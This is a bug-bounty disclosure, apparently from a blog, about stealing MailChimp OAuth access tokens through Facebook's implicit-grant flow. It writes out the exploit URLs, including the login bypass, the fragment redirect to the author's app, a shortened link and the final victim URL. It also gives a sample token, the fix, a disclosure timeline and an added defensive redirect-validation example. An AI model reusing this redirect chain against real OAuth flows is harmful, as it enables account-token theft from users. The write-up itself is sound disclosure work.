Stealing Facebook MailChimp Application OAuth 2.0 Access Token

This post is about a bug that I found in the Facebook MailChimp application's OAuth 2.0 flow, which could have been used to steal the access_token. The original idea for this bug came from a prakharprasad blog post.

[Image: MailChimp OAuth 2.0]

Facebook Ads Manager can import MailChimp customer data using OAuth 2.0. The application is part of the MailChimp website and was developed by Facebook developers. Once the MailChimp user authorises the application, it sends the MailChimp data to Facebook Ads Manager.

OAuth Authorisation URL for Facebook Custom Audiences:

Request:

https://login.mailchimp.com/oauth2/authorize?client_id=112041070777&response_type=token&redirect_uri=http://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/

Response:

https://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/#access_token=4uhbf9d433187acg50mk40cef13ec847&expires_in=0

Because the flow uses response_type=token (the implicit grant), the access token comes back in the URL fragment, and browsers keep that fragment across any further redirects whose Location has no fragment of its own.

First I tried to bypass the redirect_uri, but I couldn't. Then I tried the same OAuth flow while logged out of Facebook; it forced me to the login page.

https://www.facebook.com/login.php?next=https%3A%2F%2Fmailchimp-oauth.facebook.com%2Fads%2Fmanage%2Fcontact_importer_auth%2F#access_token=4uhbf9d433187acg50mk40cef13ec847&expires_in=0

But the /#/ redirection does not work on the login.php page, so I needed to bypass the default login page. After some searching I found this URL, which bypasses the default login page, and the /#/ redirection also worked there.

https://www.facebook.com/recover/initiate?hacked=1

MailChimp OAuth URL:

https://login.mailchimp.com/oauth2/authorize?client_id=112041070777&response_type=token&redirect_uri=http://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/#/n/?https://apps.facebook.com/redirectbug_mailchip

Shortened version of the above URL:

https://goo.gl/2Ep6BT

Final URL:

https://www.facebook.com/recover/initiate?hacked=1#/#/n/?business/url/?href=https://goo.gl/2Ep6BT&creative=1

When the victim clicks the above URL, it redirects to the MailChimp OAuth page and asks for credentials. Once the login succeeds, the access token in the response is redirected to my Facebook app URL.

The Fix:

Now the /#/ redirection no longer works on the /recover/initiate/ page, so the token is not redirected to another path.
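As an added example (not code from the original post or from Facebook), here is the kind of defender-side check a client-side fragment router such as the #/n/?<url> handler above needs: the target is accepted only if it resolves to a plain path on the application's own origin, and the fragment is never carried along. APP_ORIGIN and the function names are assumptions made for this example.

```javascript
// Added example: validating a client-side redirect target taken from the URL
// fragment, so a "#/n/?<url>" style handler can never forward an implicit-flow
// access_token (which lives in the fragment) to another origin.
// APP_ORIGIN and the function names are assumptions made for this example.
const APP_ORIGIN = "https://www.facebook.com";

// Extract the target from a fragment shaped like the post's "#/n/?<target>".
// Returns null when the fragment does not have that shape.
function targetFromFragment(hash) {
  const m = /^#\/n\/\?(.*)$/.exec(hash || "");
  return m ? m[1] : null;
}

// Return a safe same-origin path for a candidate target, or "/" if the
// candidate is anything else (absolute URL, protocol-relative "//host",
// backslash variant "/\host", unparsable input, or a different origin).
function safeNextTarget(candidate, origin = APP_ORIGIN) {
  if (typeof candidate !== "string" || !candidate.startsWith("/")) return "/";
  // "//host" and "/\host" are both resolved as authority-bearing URLs by the
  // WHATWG parser; reject them up front rather than rely on parsing alone.
  if (candidate.startsWith("//") || candidate.startsWith("/\\")) return "/";
  let resolved;
  try {
    resolved = new URL(candidate, origin); // Node's global WHATWG URL parser
  } catch (e) {
    return "/";
  }
  // Defence in depth: whatever the parser did, the result must stay on our origin.
  if (resolved.origin !== origin) return "/";
  // Drop the fragment: that is where response_type=token places the access_token.
  return resolved.pathname + resolved.search;
}

// Combine both steps: the value a fragment router should actually navigate to.
function resolveFragmentRedirect(hash, origin = APP_ORIGIN) {
  const target = targetFromFragment(hash);
  return target === null ? "/" : safeNextTarget(target, origin);
}
```

With this check in place the fragment from the post, #/n/?https://apps.facebook.com/redirectbug_mailchip, resolves to "/" instead of an off-origin navigation.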

Timeline:

8 June 2017: Report sent

15 June 2017: Further investigation by Facebook

16 June 2017: Fixed by Facebook

22 June 2017: $500 bounty awarded by Facebook
